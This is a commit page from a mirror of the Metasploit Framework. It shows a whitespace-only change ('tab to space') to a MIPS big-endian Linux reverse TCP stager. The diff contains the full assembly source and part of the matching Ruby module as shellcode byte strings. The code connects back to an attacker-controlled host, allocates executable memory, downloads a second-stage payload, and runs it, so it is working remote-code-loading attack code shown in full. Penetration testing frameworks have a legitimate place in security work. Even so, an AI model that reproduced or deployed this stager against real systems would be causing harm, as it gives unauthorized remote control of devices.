infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

tab to space

bug/bundler_fix
tkmru 2017-07-05 18:22:06 +09:00
parent 615eb53796
commit 2d8a71de6f
2 changed files with 99 additions and 99 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

190
external/source/shellcode/linux/mipsbe/stager_sock_reverse.s vendored
View File

@ -27,117 +27,117 @@
# generate the string to place on: # generate the string to place on:
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb # modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
## ##
.text .text
.align 2 .align 2
.globl main .globl main
.set nomips16 .set nomips16
main: main:
.set noreorder .set noreorder
.set nomacro .set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2) # a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2) # a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0) # a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183) # v0: syscall = __NR_socket (4183)
li $t7, -6 li $t7, -6
nor $t7, $t7, $zero nor $t7, $t7, $zero
addi $a0, $t7, -3 addi $a0, $t7, -3
addi $a1, $t7, -3 addi $a1, $t7, -3
slti $a2, $zero, -1 slti $a2, $zero, -1
li $v0, 4183 li $v0, 4183
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
sw $v0, -4($sp) # store the file descriptor for the socket on the stack sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd # a0: sockfd
# a1: addr = AF_INET (2) # a1: addr = AF_INET (2)
# a2: addrlen = 16 # a2: addrlen = 16
# v0: syscall = __NR_connect (4170) # v0: syscall = __NR_connect (4170)
lw $a0, -4($sp) lw $a0, -4($sp)
li $t7, -3 li $t7, -3
nor $t7, $t7, $zero nor $t7, $t7, $zero
sw $t7, -32($sp) sw $t7, -32($sp)
lui $t6, 0x115c lui $t6, 0x115c
sw $t6, -28($sp) sw $t6, -28($sp)
lui $t6, 0x7f00 # ip lui $t6, 0x7f00 # ip
ori $t6, $t6, 0x0001 # ip ori $t6, $t6, 0x0001 # ip
sw $t6, -26($sp) sw $t6, -26($sp)
addiu $a1, $sp, -30 addiu $a1, $sp, -30
li $t4, -17 li $t4, -17
nor $a2, $t4, $zero nor $a2, $t4, $zero
li $v0, 4170 li $v0, 4170
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1 # a0: addr = -1
# a1: lenght = 4096 # a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7) # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1 # sp(16): fd = -1
# sp(20): offset = 0 # sp(20): offset = 0
# v0: syscall = __NR_mmap (4090) # v0: syscall = __NR_mmap (4090)
li $a0, -1 li $a0, -1
li $a1, 4097 li $a1, 4097
addi $a1, $a1, -1 addi $a1, $a1, -1
li $t1, -8 li $t1, -8
nor $t1, $t1, $0 nor $t1, $t1, $0
add $a2, $t1, $0 add $a2, $t1, $0
li $a3, 2050 li $a3, 2050
li $t3, -22 li $t3, -22
nor $t3, $t3, $zero nor $t3, $t3, $zero
add $t3, $sp, $t3 add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090 li $v0, 4090
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
sw $v0, -8($sp) # Stores the mmap'ed address on the stack sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096) # read(sockfd, addr, 4096)
# a0: sockfd # a0: sockfd
# a1: addr # a1: addr
# a2: len = 4096 # a2: len = 4096
# v0: syscall = __NR_read (4003) # v0: syscall = __NR_read (4003)
lw $a0, -4($sp) lw $a0, -4($sp)
lw $a1, -8($sp) lw $a1, -8($sp)
li $a2, 4097 li $a2, 4097
addi $a2, $a2, -1 addi $a2, $a2, -1
li $v0, 4003 li $v0, 4003
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
# cacheflush(addr, nbytes, DCACHE) # cacheflush(addr, nbytes, DCACHE)
# a0: addr # a0: addr
# a1: nbytes # a1: nbytes
# a2: cache = DCACHE (2) # a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147) # v0: syscall = __NR_read (4147)
lw $a0, -8($sp) lw $a0, -8($sp)
add $a1, $v0, $zero add $a1, $v0, $zero
li $t1, -3 li $t1, -3
nor $t1, $t1, $0 nor $t1, $t1, $0
add $a2, $t1, $0 add $a2, $t1, $0
li $v0, 4147 li $v0, 4147
syscall 0x40404 syscall 0x40404
slt $s0, $zero, $a3 slt $s0, $zero, $a3
bne $s0, $zero, failed bne $s0, $zero, failed
# jmp to the stage # jmp to the stage
lw $s1, -8($sp) lw $s1, -8($sp)
lw $s2, -4($sp) lw $s2, -4($sp)
jalr $s1 jalr $s1
failed: failed:
# exit(status) # exit(status)
# a0: status # a0: status
# v0: syscall = __NR_exit (4001) # v0: syscall = __NR_exit (4001)
li $a0, 1 li $a0, 1
li $v0, 4001 li $v0, 4001
syscall 0x40404 syscall 0x40404
.set macro .set macro
.set reorder .set reorder

8
modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
View File

@ -104,11 +104,11 @@ module MetasploitModule
"\x8f\xb2\xff\xfc" + # lw s2,-4(sp) "\x8f\xb2\xff\xfc" + # lw s2,-4(sp)
"\x02\x20\xf8\x09" + # jalr s1 "\x02\x20\xf8\x09" + # jalr s1
# 4006bc <failed>: # 4006bc <failed>:
"\x24\x04\x00\x01" + # li a0,1 "\x24\x04\x00\x01" + # li a0,1
"\x24\x02\x0f\xa1" + # li v0,4001 "\x24\x02\x0f\xa1" + # li v0,4001
# exit(status) # exit(status)
"\x01\x01\x01\x0c" + # syscall 0x40404 "\x01\x01\x01\x0c" + # syscall 0x40404
"\x00\x20\x08\x25" + # move at,at "\x00\x20\x08\x25" + # move at,at
"\x00\x20\x08\x25" # move at,at "\x00\x20\x08\x25" # move at,at
} }
)) ))